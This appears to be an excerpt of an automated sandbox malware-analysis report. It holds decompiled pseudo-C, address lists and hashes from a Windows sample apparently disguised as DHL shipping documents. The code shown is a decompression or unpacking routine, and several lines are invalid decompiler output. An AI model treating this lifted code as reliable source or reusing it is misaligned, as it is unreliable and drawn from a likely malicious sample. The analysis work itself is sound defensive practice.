                        														__cx = __ax >> 5;
                        														__eax = __eax - __ecx;
                        														__edi = __edi + 1;
                        														__eflags = __edi;
                        														 *(__ebp - 0x44) = __ebx;
                        														 *__esi = __ax;
                        														 *(__ebp - 0x50) = __edi;
                        													} else {
                        														 *(__ebp - 0x10) = __edx;
                        														0x800 = 0x800 - __ecx;
                        														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                        														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                        														 *__esi = __dx;
                        													}
                        													__eflags =  *(__ebp - 0x10) - 0x1000000;
                        													if( *(__ebp - 0x10) >= 0x1000000) {
                        														L112:
                        														_t369 = __ebp - 0x48;
                        														 *_t369 =  *(__ebp - 0x48) + 1;
                        														__eflags =  *_t369;
                        														goto L113;
                        													} else {
                        														goto L110;
                        													}
                        												}
                        												__ecx =  *(__ebp - 0xc);
                        												__ebx = __ebx + __ebx;
                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                        												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                        												 *(__ebp - 0x44) = __ebx;
                        												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                        													__ecx =  *(__ebp - 0x10);
                        													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                        													__ebx = __ebx | 0x00000001;
                        													__eflags = __ebx;
                        													 *(__ebp - 0x44) = __ebx;
                        												}
                        												__eflags =  *(__ebp - 0x10) - 0x1000000;
                        												if( *(__ebp - 0x10) >= 0x1000000) {
                        													L102:
                        													_t339 = __ebp - 0x48;
                        													 *_t339 =  *(__ebp - 0x48) - 1;
                        													__eflags =  *_t339;
                        													goto L103;
                        												} else {
                        													goto L100;
                        												}
                        											}
                        											__edx =  *(__ebp - 4);
                        											__eax = __eax - __ebx;
                        											 *(__ebp - 0x40) = __ecx;
                        											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                        											goto L109;
                        										case 0x1a:
                        											L56:
                        											__eflags =  *(__ebp - 0x64);
                        											if( *(__ebp - 0x64) == 0) {
                        												 *(__ebp - 0x88) = 0x1a;
                        												goto L170;
                        											}
                        											__ecx =  *(__ebp - 0x68);
                        											__al =  *(__ebp - 0x5c);
                        											__edx =  *(__ebp - 8);
                        											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                        											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                        											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                        											 *( *(__ebp - 0x68)) = __al;
                        											__ecx =  *(__ebp - 0x14);
                        											 *(__ecx +  *(__ebp - 8)) = __al;
                        											__eax = __ecx + 1;
                        											__edx = 0;
                        											_t192 = __eax %  *(__ebp - 0x74);
                        											__eax = __eax /  *(__ebp - 0x74);
                        											__edx = _t192;
                        											goto L80;
                        										case 0x1b:
                        											L76:
                        											__eflags =  *(__ebp - 0x64);
                        											if( *(__ebp - 0x64) == 0) {
                        												 *(__ebp - 0x88) = 0x1b;
                        												goto L170;
                        											}
                        											__eax =  *(__ebp - 0x14);
                        											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                        											__eflags = __eax -  *(__ebp - 0x74);
                        											if(__eax >=  *(__ebp - 0x74)) {
                        												__eax = __eax +  *(__ebp - 0x74);
                        												__eflags = __eax;
                        											}
                        											__edx =  *(__ebp - 8);
                        											__cl =  *(__eax + __edx);
                        											__eax =  *(__ebp - 0x14);
                        											 *(__ebp - 0x5c) = __cl;
                        											 *(__eax + __edx) = __cl;
                        											__eax = __eax + 1;
                        											__edx = 0;
                        											_t275 = __eax %  *(__ebp - 0x74);
                        											__eax = __eax /  *(__ebp - 0x74);
                        											__edx = _t275;
                        											__eax =  *(__ebp - 0x68);
                        											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                        											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                        											_t284 = __ebp - 0x64;
                        											 *_t284 =  *(__ebp - 0x64) - 1;
                        											__eflags =  *_t284;
                        											 *( *(__ebp - 0x68)) = __cl;
                        											L80:
                        											 *(__ebp - 0x14) = __edx;
                        											goto L81;
                        										case 0x1c:
                        											while(1) {
                        												L124:
                        												__eflags =  *(__ebp - 0x64);
                        												if( *(__ebp - 0x64) == 0) {
                        													break;
                        												}
                        												__eax =  *(__ebp - 0x14);
                        												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                        												__eflags = __eax -  *(__ebp - 0x74);
                        												if(__eax >=  *(__ebp - 0x74)) {
                        													__eax = __eax +  *(__ebp - 0x74);
                        													__eflags = __eax;
                        												}
                        												__edx =  *(__ebp - 8);
                        												__cl =  *(__eax + __edx);
                        												__eax =  *(__ebp - 0x14);
                        												 *(__ebp - 0x5c) = __cl;
                        												 *(__eax + __edx) = __cl;
                        												__eax = __eax + 1;
                        												__edx = 0;
                        												_t415 = __eax %  *(__ebp - 0x74);
                        												__eax = __eax /  *(__ebp - 0x74);
                        												__edx = _t415;
                        												__eax =  *(__ebp - 0x68);
                        												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                        												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                        												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                        												__eflags =  *(__ebp - 0x30);
                        												 *( *(__ebp - 0x68)) = __cl;
                        												 *(__ebp - 0x14) = _t415;
                        												if( *(__ebp - 0x30) > 0) {
                        													continue;
                        												} else {
                        													L81:
                        													 *(__ebp - 0x88) = 2;
                        													goto L1;
                        												}
                        											}
                        											 *(__ebp - 0x88) = 0x1c;
                        											L170:
                        											_push(0x22);
                        											_pop(_t567);
                        											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
                        											_t535 = 0;
                        											L172:
                        											return _t535;
                        									}
                        								}
                        								L171:
                        								_t535 = _t534 | 0xffffffff;
                        								goto L172;
                        							}
                        						}
                        						__eax =  *(__ebp - 0x50);
                        						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                        						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                        						__eax =  *(__ebp - 0x58);
                        						__esi = __edx + __eax;
                        						 *(__ebp - 0x54) = __esi;
                        						__ax =  *__esi;
                        						__edi = __ax & 0x0000ffff;
                        						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                        						if( *(__ebp - 0xc) >= __ecx) {
                        							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                        							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                        							__cx = __ax;
                        							__cx = __ax >> 5;
                        							__eax = __eax - __ecx;
                        							__edx = __edx + 1;
                        							 *__esi = __ax;
                        							 *(__ebp - 0x50) = __edx;
                        						} else {
                        							 *(__ebp - 0x10) = __ecx;
                        							0x800 = 0x800 - __edi;
                        							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                        							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                        							 *__esi = __cx;
                        						}
                        						if( *(__ebp - 0x10) >= 0x1000000) {
                        							goto L148;
                        						} else {
                        							goto L146;
                        						}
                        					}
                        					goto L1;
                        				}
                        			}








                        0x00406ee4
                        0x00406ee7
                        0x00406eea
                        0x00406eed
                        0x00406ef0
                        0x00406ef3
                        0x00406ef6
                        0x00406ef9
                        0x00406efc
                        0x00406f14
                        0x00406f17
                        0x00406f1a
                        0x00406f1d
                        0x00406f1d
                        0x00406f20
                        0x00406f24
                        0x00406f26
                        0x00406efe
                        0x00406efe
                        0x00406f06
                        0x00406f0b
                        0x00406f0d
                        0x00406f0f
                        0x00406f0f
                        0x00406f29
                        0x00406f30
                        0x00406f33
                        0x00000000
                        0x00406f35
                        0x00000000
                        0x00406f35
                        0x00406f33
                        0x00406f3a
                        0x00406f3a
                        0x00406f3a
                        0x00406f3a
                        0x00000000
                        0x00000000
                        0x00406f75
                        0x00406f75
                        0x00406f79
                        0x00407581
                        0x00000000
                        0x00407581
                        0x00406f7f
                        0x00406f82
                        0x00406f85
                        0x00406f89
                        0x00406f8c
                        0x00406f92
                        0x00406f94
                        0x00406f94
                        0x00406f94
                        0x00406f97
                        0x00406f9a
                        0x00406f9a
                        0x00406fa0
                        0x00406f3e
                        0x00406f3e
                        0x00406f41
                        0x00000000
                        0x00406f41
                        0x00406fa2
                        0x00406fa2
                        0x00406fa5
                        0x00406fa8
                        0x00406fab
                        0x00406fae
                        0x00406fb1
                        0x00406fb4
                        0x00406fb7
                        0x00406fba
                        0x00406fbd
                        0x00406fc0
                        0x00406fd8
                        0x00406fdb
                        0x00406fde
                        0x00406fe1
                        0x00406fe1
                        0x00406fe4
                        0x00406fe8
                        0x00406fea
                        0x00406fc2
                        0x00406fc2
                        0x00406fca
                        0x00406fcf
                        0x00406fd1
                        0x00406fd3
                        0x00406fd3
                        0x00406fed
                        0x00406ff4
                        0x00406ff7
                        0x00000000
                        0x00406ff9
                        0x00000000
                        0x00406ff9
                        0x00000000
                        0x00407286
                        0x00407286
                        0x0040728a
                        0x004075b1
                        0x00000000
                        0x004075b1
                        0x00407290
                        0x00407293
                        0x00407296
                        0x0040729a
                        0x0040729d
                        0x004072a3
                        0x004072a5
                        0x004072a5
                        0x004072a5
                        0x004072a8
                        0x00000000
                        0x00000000
                        0x00407056
                        0x00407056
                        0x00407059
                        0x004073cb
                        0x004073cb
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00407452
                        0x00407456
                        0x00407474
                        0x00407474
                        0x00407474
                        0x0040747b
                        0x00407482
                        0x00000000
                        0x00407482
                        0x00407458
                        0x0040745b
                        0x0040745e
                        0x00407461
                        0x00407468
                        0x00000000
                        0x00000000
                        0x00407543
                        0x00407546
                        0x00407447
                        0x00407447
                        0x00000000
                        0x00000000
                        0x0040717d
                        0x0040717f
                        0x00407186
                        0x00407187
                        0x00407189
                        0x0040718c
                        0x00000000
                        0x00000000
                        0x00407194
                        0x00407197
                        0x0040719a
                        0x0040719c
                        0x0040719e
                        0x0040719e
                        0x0040719f
                        0x004071a2
                        0x004071a9
                        0x004071ac
                        0x004071ba
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0040749f
                        0x0040749f
                        0x004074a3
                        0x004075db
                        0x00000000
                        0x004075db
                        0x004074a9
                        0x004074ac
                        0x004074af
                        0x004074b3
                        0x004074b6
                        0x004074bc
                        0x004074be
                        0x004074be
                        0x004074be
                        0x004074c1
                        0x004074c4
                        0x004074c4
                        0x004074c4
                        0x004074c4
                        0x00000000
                        0x00000000
                        0x004071c2
                        0x004071c5
                        0x004071fb
                        0x0040732b
                        0x0040732b
                        0x0040732b
                        0x0040732b
                        0x0040732e
                        0x0040732e
                        0x00407331
                        0x00407333
                        0x004075bd
                        0x00000000
                        0x004075bd
                        0x00407339
                        0x0040733c
                        0x00000000
                        0x00000000
                        0x00407342
                        0x00407346
                        0x00407349
                        0x00407349
                        0x00407349
                        0x00000000
                        0x00407349
                        0x004071c7
                        0x004071c9
                        0x004071cb
                        0x004071cd
                        0x004071d0
                        0x004071d1
                        0x004071d3
                        0x004071d5
                        0x004071d8
                        0x004071db
                        0x004071f1
                        0x004071f6
                        0x0040722e
                        0x0040722e
                        0x00407232
                        0x0040725e
                        0x00407260
                        0x00407267
                        0x0040726a
                        0x0040726d
                        0x0040726d
                        0x00407272
                        0x00407272
                        0x00407274
                        0x00407277
                        0x0040727e
                        0x00407281
                        0x004072ae
                        0x004072ae
                        0x004072b1
                        0x004072b4
                        0x00407328
                        0x00407328
                        0x00407328
                        0x00000000
                        0x00407328
                        0x004072b6
                        0x004072bc
                        0x004072bf
                        0x004072c2
                        0x004072c5
                        0x004072c8
                        0x004072cb
                        0x004072ce
                        0x004072d1
                        0x004072d4
                        0x004072d7
                        0x004072f0
                        0x004072f2
                        0x004072f5
                        0x004072f6
                        0x004072f9
                        0x004072fb
                        0x004072fe
                        0x00407300
                        0x00407302
                        0x00407305
                        0x00407307
                        0x0040730a
                        0x0040730e
                        0x00407310
                        0x00407310
                        0x00407311
                        0x00407314
                        0x00407317
                        0x004072d9
                        0x004072d9
                        0x004072e1
                        0x004072e6
                        0x004072e8
                        0x004072eb
                        0x004072eb
                        0x0040731a
                        0x00407321
                        0x004072ab
                        0x004072ab
                        0x004072ab
                        0x004072ab
                        0x00000000
                        0x00407323
                        0x00000000
                        0x00407323
                        0x00407321
                        0x00407234
                        0x00407237
                        0x00407239
                        0x0040723c
                        0x0040723f
                        0x00407242
                        0x00407244
                        0x00407247
                        0x0040724a
                        0x0040724a
                        0x0040724d
                        0x0040724d
                        0x00407250
                        0x00407257
                        0x0040722b
                        0x0040722b
                        0x0040722b
                        0x0040722b
                        0x00000000
                        0x00407259
                        0x00000000
                        0x00407259
                        0x00407257
                        0x004071dd
                        0x004071e0
                        0x004071e2
                        0x004071e5
                        0x00000000
                        0x00000000
                        0x00406f44
                        0x00406f44
                        0x00406f48
                        0x0040758d
                        0x00000000
                        0x0040758d
                        0x00406f4e
                        0x00406f51
                        0x00406f54
                        0x00406f57
                        0x00406f5a
                        0x00406f5d
                        0x00406f60
                        0x00406f62
                        0x00406f65
                        0x00406f68
                        0x00406f6b
                        0x00406f6d
                        0x00406f6d
                        0x00406f6d
                        0x00000000
                        0x00000000
                        0x004070cf
                        0x004070cf
                        0x004070d3
                        0x00407599
                        0x00000000
                        0x00407599
                        0x004070d9
                        0x004070dc
                        0x004070df
                        0x004070e2
                        0x004070e4
                        0x004070e4
                        0x004070e4
                        0x004070e7
                        0x004070ea
                        0x004070ed
                        0x004070f0
                        0x004070f3
                        0x004070f6
                        0x004070f7
                        0x004070f9
                        0x004070f9
                        0x004070f9
                        0x004070fc
                        0x004070ff
                        0x00407102
                        0x00407105
                        0x00407105
                        0x00407105
                        0x00407108
                        0x0040710a
                        0x0040710a
                        0x00000000
                        0x00000000
                        0x0040734c
                        0x0040734c
                        0x0040734c
                        0x00407350
                        0x00000000
                        0x00000000
                        0x00407356
                        0x00407359
                        0x0040735c
                        0x0040735f
                        0x00407361
                        0x00407361
                        0x00407361
                        0x00407364
                        0x00407367
                        0x0040736a
                        0x0040736d
                        0x00407370
                        0x00407373
                        0x00407374
                        0x00407376
                        0x00407376
                        0x00407376
                        0x00407379
                        0x0040737c
                        0x0040737f
                        0x00407382
                        0x00407385
                        0x00407389
                        0x0040738b
                        0x0040738e
                        0x00000000
                        0x00407390
                        0x0040710d
                        0x0040710d
                        0x00000000
                        0x0040710d
                        0x0040738e
                        0x004075c3
                        0x004075e5
                        0x004075eb
                        0x004075ed
                        0x004075f4
                        0x004075f6
                        0x004075fd
                        0x00407601
                        0x00000000
                        0x00406bf2
                        0x004075fa
                        0x004075fa
                        0x00000000
                        0x004075fa
                        0x00407447
                        0x004074cd
                        0x004074d3
                        0x004074d6
                        0x004074d9
                        0x004074dc
                        0x004074df
                        0x004074e2
                        0x004074e5
                        0x004074e8
                        0x004074ee
                        0x00407507
                        0x0040750a
                        0x0040750d
                        0x00407510
                        0x00407514
                        0x00407516
                        0x00407517
                        0x0040751a
                        0x004074f0
                        0x004074f0
                        0x004074f8
                        0x004074fd
                        0x004074ff
                        0x00407502
                        0x00407502
                        0x00407524
                        0x00000000
                        0x00407526
                        0x00000000
                        0x00407526
                        0x00407524
                        0x00000000
                        0x00407399

                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
                        • Instruction ID: d49815ad38d406b3cd0a1a90ea7be1526168d9e39684835ffa6a026ef1ef4849
                        • Opcode Fuzzy Hash: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
                        • Instruction Fuzzy Hash: 91913270D04228DBEF28CF98C8547ADBBB1FF44305F14816AD856BB281D778A986DF45
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 98%
                        			E004070AB() {
                        				unsigned short _t532;
                        				signed int _t533;
                        				void _t534;
                        				void* _t535;
                        				signed int _t536;
                        				signed int _t565;
                        				signed int _t568;
                        				signed int _t589;
                        				signed int* _t606;
                        				void* _t613;
                        
                        				L0:
                        				while(1) {
                        					L0:
                        					if( *(_t613 - 0x40) != 0) {
                        						L89:
                        						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
                        						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
                        						L69:
                        						_t606 =  *(_t613 - 0x58);
                        						 *(_t613 - 0x84) = 0x12;
                        						L132:
                        						 *(_t613 - 0x54) = _t606;
                        						L133:
                        						_t532 =  *_t606;
                        						_t589 = _t532 & 0x0000ffff;
                        						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                        						if( *(_t613 - 0xc) >= _t565) {
                        							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                        							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                        							 *(_t613 - 0x40) = 1;
                        							_t533 = _t532 - (_t532 >> 5);
                        							 *_t606 = _t533;
                        						} else {
                        							 *(_t613 - 0x10) = _t565;
                        							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                        							 *_t606 = (0x800 - _t589 >> 5) + _t532;
                        						}
                        						if( *(_t613 - 0x10) >= 0x1000000) {
                        							L139:
                        							_t534 =  *(_t613 - 0x84);
                        							L140:
                        							 *(_t613 - 0x88) = _t534;
                        							goto L1;
                        						} else {
                        							L137:
                        							if( *(_t613 - 0x6c) == 0) {
                        								 *(_t613 - 0x88) = 5;
                        								goto L170;
                        							}
                        							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                        							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                        							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                        							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                        							goto L139;
                        						}
                        					} else {
                        						if( *(__ebp - 0x60) == 0) {
                        							L171:
                        							_t536 = _t535 | 0xffffffff;
                        							L172:
                        							return _t536;
                        						}
                        						__eax = 0;
                        						_t258 =  *(__ebp - 0x38) - 7 >= 0;
                        						0 | _t258 = _t258 + _t258 + 9;
                        						 *(__ebp - 0x38) = _t258 + _t258 + 9;
                        						L75:
                        						if( *(__ebp - 0x64) == 0) {
                        							 *(__ebp - 0x88) = 0x1b;
                        							L170:
                        							_t568 = 0x22;
                        							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                        							_t536 = 0;
                        							goto L172;
                        						}
                        						__eax =  *(__ebp - 0x14);
                        						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                        						if(__eax >=  *(__ebp - 0x74)) {
                        							__eax = __eax +  *(__ebp - 0x74);
                        						}
                        						__edx =  *(__ebp - 8);
                        						__cl =  *(__eax + __edx);
                        						__eax =  *(__ebp - 0x14);
                        						 *(__ebp - 0x5c) = __cl;
                        						 *(__eax + __edx) = __cl;
                        						__eax = __eax + 1;
                        						__edx = 0;
                        						_t274 = __eax %  *(__ebp - 0x74);
                        						__eax = __eax /  *(__ebp - 0x74);
                        						__edx = _t274;
                        						__eax =  *(__ebp - 0x68);
                        						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                        						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                        						_t283 = __ebp - 0x64;
                        						 *_t283 =  *(__ebp - 0x64) - 1;
                        						 *( *(__ebp - 0x68)) = __cl;
                        						L79:
                        						 *(__ebp - 0x14) = __edx;
                        						L80:
                        						 *(__ebp - 0x88) = 2;
                        					}
                        					L1:
                        					_t535 =  *(_t613 - 0x88);
                        					if(_t535 > 0x1c) {
                        						goto L171;
                        					}
                        					switch( *((intOrPtr*)(_t535 * 4 +  &M00407602))) {
                        						case 0:
                        							if( *(_t613 - 0x6c) == 0) {
                        								goto L170;
                        							}
                        							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                        							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                        							_t535 =  *( *(_t613 - 0x70));
                        							if(_t535 > 0xe1) {
                        								goto L171;
                        							}
                        							_t539 = _t535 & 0x000000ff;
                        							_push(0x2d);
                        							asm("cdq");
                        							_pop(_t570);
                        							_push(9);
                        							_pop(_t571);
                        							_t609 = _t539 / _t570;
                        							_t541 = _t539 % _t570 & 0x000000ff;
                        							asm("cdq");
                        							_t604 = _t541 % _t571 & 0x000000ff;
                        							 *(_t613 - 0x3c) = _t604;
                        							 *(_t613 - 0x1c) = (1 << _t609) - 1;
                        							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
                        							_t612 = (0x300 << _t604 + _t609) + 0x736;
                        							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                        								L10:
                        								if(_t612 == 0) {
                        									L12:
                        									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                        									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                        									goto L15;
                        								} else {
                        									goto L11;
                        								}
                        								do {
                        									L11:
                        									_t612 = _t612 - 1;
                        									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                        								} while (_t612 != 0);
                        								goto L12;
                        							}
                        							if( *(_t613 - 4) != 0) {
                        								GlobalFree( *(_t613 - 4));
                        							}
                        							_t535 = GlobalAlloc(0x40, 0x600); // executed
                        							 *(_t613 - 4) = _t535;
                        							if(_t535 == 0) {
                        								goto L171;
                        							} else {
                        								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                        								goto L10;
                        							}
                        						case 1:
                        							L13:
                        							__eflags =  *(_t613 - 0x6c);
                        							if( *(_t613 - 0x6c) == 0) {
                        								 *(_t613 - 0x88) = 1;
                        								goto L170;
                        							}
                        							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                        							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                        							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                        							_t45 = _t613 - 0x48;
                        							 *_t45 =  *(_t613 - 0x48) + 1;
                        							__eflags =  *_t45;
                        							L15:
                        							if( *(_t613 - 0x48) < 4) {
                        								goto L13;
                        							}
                        							_t547 =  *(_t613 - 0x40);
                        							if(_t547 ==  *(_t613 - 0x74)) {
                        								L20:
                        								 *(_t613 - 0x48) = 5;
                        								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                        								goto L23;
                        							}
                        							 *(_t613 - 0x74) = _t547;
                        							if( *(_t613 - 8) != 0) {
                        								GlobalFree( *(_t613 - 8));
                        							}
                        							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                        							 *(_t613 - 8) = _t535;
                        							if(_t535 == 0) {
                        								goto L171;
                        							} else {
                        								goto L20;
                        							}
                        						case 2:
                        							L24:
                        							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                        							 *(_t613 - 0x84) = 6;
                        							 *(_t613 - 0x4c) = _t554;
                        							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
                        							goto L132;
                        						case 3:
                        							L21:
                        							__eflags =  *(_t613 - 0x6c);
                        							if( *(_t613 - 0x6c) == 0) {
                        								 *(_t613 - 0x88) = 3;
                        								goto L170;
                        							}
                        							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                        							_t67 = _t613 - 0x70;
                        							 *_t67 =  &(( *(_t613 - 0x70))[1]);
                        							__eflags =  *_t67;
                        							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                        							L23:
                        							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                        							if( *(_t613 - 0x48) != 0) {
                        								goto L21;
                        							}
                        							goto L24;
                        						case 4:
                        							goto L133;
                        						case 5:
                        							goto L137;
                        						case 6:
                        							__edx = 0;
                        							__eflags =  *(__ebp - 0x40);
                        							if( *(__ebp - 0x40) != 0) {
                        								__eax =  *(__ebp - 4);
                        								__ecx =  *(__ebp - 0x38);
                        								 *(__ebp - 0x34) = 1;
                        								 *(__ebp - 0x84) = 7;
                        								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                        								goto L132;
                        							}
                        							__eax =  *(__ebp - 0x5c) & 0x000000ff;
                        							__esi =  *(__ebp - 0x60);
                        							__cl = 8;
                        							__cl = 8 -  *(__ebp - 0x3c);
                        							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                        							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                        							__ecx =  *(__ebp - 0x3c);
                        							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                        							__ecx =  *(__ebp - 4);
                        							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                        							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                        							__eflags =  *(__ebp - 0x38) - 4;
                        							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                        							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                        							if( *(__ebp - 0x38) >= 4) {
                        								__eflags =  *(__ebp - 0x38) - 0xa;
                        								if( *(__ebp - 0x38) >= 0xa) {
                        									_t98 = __ebp - 0x38;
                        									 *_t98 =  *(__ebp - 0x38) - 6;
                        									__eflags =  *_t98;
                        								} else {
                        									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                        								}
                        							} else {
                        								 *(__ebp - 0x38) = 0;
                        							}
                        							__eflags =  *(__ebp - 0x34) - __edx;
                        							if( *(__ebp - 0x34) == __edx) {
                        								__ebx = 0;
                        								__ebx = 1;
                        								goto L61;
                        							} else {
                        								__eax =  *(__ebp - 0x14);
                        								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                        								__eflags = __eax -  *(__ebp - 0x74);
                        								if(__eax >=  *(__ebp - 0x74)) {
                        									__eax = __eax +  *(__ebp - 0x74);
                        									__eflags = __eax;
                        								}
                        								__ecx =  *(__ebp - 8);
                        								__ebx = 0;
                        								__ebx = 1;
                        								__al =  *((intOrPtr*)(__eax + __ecx));
                        								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                        								goto L41;
                        							}
                        						case 7:
                        							__eflags =  *(__ebp - 0x40) - 1;
                        							if( *(__ebp - 0x40) != 1) {
                        								__eax =  *(__ebp - 0x24);
                        								 *(__ebp - 0x80) = 0x16;
                        								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                        								__eax =  *(__ebp - 0x28);
                        								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                        								__eax =  *(__ebp - 0x2c);
                        								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                        								__eax = 0;
                        								__eflags =  *(__ebp - 0x38) - 7;
                        								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                        								__al = __al & 0x000000fd;
                        								__eax = (__eflags >= 0) - 1 + 0xa;
                        								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                        								__eax =  *(__ebp - 4);
                        								__eax =  *(__ebp - 4) + 0x664;
                        								__eflags = __eax;
                        								 *(__ebp - 0x58) = __eax;
                        								goto L69;
                        							}
                        							__eax =  *(__ebp - 4);
                        							__ecx =  *(__ebp - 0x38);
                        							 *(__ebp - 0x84) = 8;
